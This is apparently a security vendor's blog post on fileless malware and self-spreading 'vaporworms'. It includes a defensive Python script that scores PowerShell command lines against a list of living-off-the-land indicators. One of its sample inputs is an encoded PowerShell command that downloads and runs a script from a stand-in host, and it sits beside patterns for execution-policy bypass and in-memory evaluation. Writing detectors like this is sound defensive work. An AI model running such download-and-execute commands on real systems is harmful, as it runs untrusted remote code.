Understanding the Vaporworm Threat


Malware is constantly evolving as attackers develop new and more sophisticated variants to bypass or defeat enterprise network security defenses. In recent years, fileless malware has made headlines due to its ability to circumvent many of the protections used by traditional antivirus solutions.

In 2019, the vaporworm threat has emerged as the next evolution of malware, combining the subtlety of fileless malware with the scalability of self-spreading worms.

What is Fileless Malware?

Traditional malware and antivirus systems are very file-focused. When a computer was infected with malware, it was because an executable file had been downloaded and run on it through one of many attack vectors (phishing, web application vulnerabilities, etc.).

This made traditional antivirus (AV) solutions simple but effective. These AVs scanned every file on the system and compared them to known “signatures” of malicious files. If a file matched the signature, it would be quarantined and deleted (if it managed to install itself at all).

Fileless malware was developed to defeat this file-focused technique by creating malware that operates solely in the computer’s memory. By never writing itself to disk, this type of malware evades traditional antivirus software that focuses on files saved to disk.

Fileless malware accomplishes its goals by “living off the land”. Every computer ships with powerful built-in programs (PowerShell, for example) that attackers can turn to their own ends. By using these built-in programs (which are also used by legitimate system administrators) and operating from memory instead of from a file written to disk, fileless malware becomes stealthier and more difficult to detect than traditional variants.
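Because fileless malware leaves no file for a scanner to hash, defenders look instead at how the built-in tools are invoked. The following Python script is an added example, not code from the original article or from WatchGuard: it triages PowerShell command lines of the kind recorded by process-creation or script-block logging, decodes any `-EncodedCommand` argument (base64 over UTF-16LE) so the encoded payload is inspected too, and scores each line against a handful of “living off the land” indicators. The indicator list, the weights, the alert threshold and the four sample command lines are all assumptions constructed for this example; tune them against your own baseline of legitimate administrative activity.

```python
import base64
import re
from dataclasses import dataclass
from typing import Optional

# Heuristic indicators of "living off the land" PowerShell use. The weights are
# an assumption for this example, not a vendor scoring model.
INDICATORS = [
    (r"-(?:enc|encodedcommand|e)\b", "encoded command", 3),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window", 2),
    (r"-ex(?:ecutionpolicy)?\s+bypass", "execution policy bypass", 2),
    (r"\biex\b|invoke-expression", "in-memory script evaluation", 2),
    (r"downloadstring|net\.webclient|invoke-webrequest", "remote content fetch", 2),
    (r"-nop(?:rofile)?\b", "profile suppressed", 1),
    (r"-noni(?:nteractive)?\b", "non-interactive", 1),
]

# An -EncodedCommand argument: the switch followed by a base64 blob.
ENCODED_ARG = re.compile(r"-(?:enc|encodedcommand|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class Finding:
    cmdline: str
    score: int
    reasons: list
    decoded: Optional[str] = None


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument (PowerShell uses
    base64 over UTF-16LE), or None if there is none or it does not decode."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline):
    """Score one command line against INDICATORS, matching on the decoded
    payload as well so an encoded blob cannot hide its contents."""
    decoded = decode_encoded_command(cmdline)
    m = ENCODED_ARG.search(cmdline)
    # Replace the base64 blob with a marker so no pattern matches by accident
    # inside random-looking base64 text.
    visible = cmdline if not m else cmdline[:m.start(1)] + "<blob>" + cmdline[m.end(1):]
    text = visible + ("\n" + decoded if decoded else "")
    score, reasons = 0, []
    for pattern, label, weight in INDICATORS:
        if re.search(pattern, text, re.I):
            score += weight
            reasons.append(label)
    return Finding(cmdline, score, reasons, decoded)


def triage(cmdlines, threshold=4):
    """Return only the findings at or above the alert threshold, highest first."""
    hits = [analyze(c) for c in cmdlines]
    return sorted((f for f in hits if f.score >= threshold), key=lambda f: -f.score)


def _encode_for_sample(script):
    """Build the UTF-16LE base64 form PowerShell expects; used here only so the
    constructed sample lines stay readable in the source."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines, not real telemetry: two routine admin
# invocations, one hidden encoded run, and one encoded in-memory download.
SAMPLE_CMDLINES = [
    "powershell.exe -NoProfile -Command Get-Service -Name Spooler",
    "powershell.exe -File C:\\Scripts\\nightly-backup.ps1",
    "powershell.exe -NoP -NonI -W Hidden -Enc "
    + _encode_for_sample("Get-Process | Out-File C:\\Temp\\procs.txt"),
    "powershell.exe -enc "
    + _encode_for_sample("IEX (New-Object Net.WebClient).DownloadString('http://update.example.invalid/a.ps1')"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_CMDLINES):
        print(f"score={f.score} reasons={f.reasons}")
        print(f"  cmdline: {f.cmdline[:60]}...")
        if f.decoded:
            print(f"  decoded: {f.decoded}")
```

The two routine lines score 1 and 0 and stay below the threshold, while both encoded lines score 7: the third because of its hidden, non-interactive, encoded invocation, the fourth only because the blob was decoded and the in-memory download inside it was seen. That last point is the practical lesson: a rule that matches on the raw command line alone misses what an encoded command carries.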

Vaporworms and How They’re Different

Fileless malware is bad enough, but vaporworms advance the threat to the next level. A vaporworm is a fileless malware variant that also has the ability to spread itself without human interaction.

If you’re familiar with the WannaCry and NotPetya epidemics, then you’re familiar with worms. These malware variants don’t use phishing or other human-aided mechanisms to spread themselves. Instead, they take advantage of vulnerabilities in systems to infect them.

For example, WannaCry used the EternalBlue exploit developed by the National Security Agency. This exploit took advantage of vulnerabilities in the Server Message Block (SMB) protocol, which is used for file sharing on Windows devices.

Instead of generating phishing emails and trying to collect clicks, worm authors develop and launch their malware. The malware takes care of spreading on its own by scanning for vulnerable devices and sending a copy of itself to exploit and execute there.

WatchGuard Technologies’ information security predictions for 2019 highlight the severity of this threat.

“Cyber criminals are continuing to reshape the threat landscape as they update their tactics and escalate their attacks against businesses, governments and even the infrastructure of the internet itself,” said WatchGuard Technologies CTO Corey Nachreiner.

Protecting Against Vaporworms

When dealing with any worm variant, a proactive approach is essential. This type of malware spreads by identifying and exploiting vulnerabilities in your systems. Failing to identify and patch any of the vulnerabilities currently being used by worms could result in your system being infected with malware.

With vaporworms, the need to perform vulnerability scanning and patching on a regular basis is even more pressing. Since vaporworms are fileless malware, your traditional antivirus defenses may not be capable of detecting and removing them. If a vaporworm gets onto your computer, there’s a good chance it’s there to stay unless removed by an expert.

Penetration testing is another good way to test your systems. A pen test is a simulated cyber attack against your systems to check for vulnerabilities before bad actors find them. Also known as ethical hacking, pen tests that include manual analysis identify flawed logic, misconfigurations, vulnerability chaining, and more to show the security impact to your business.

If you want more information about how to set up a vulnerability scanning program or penetration testing to stop vaporworms, reach out for a consultation.
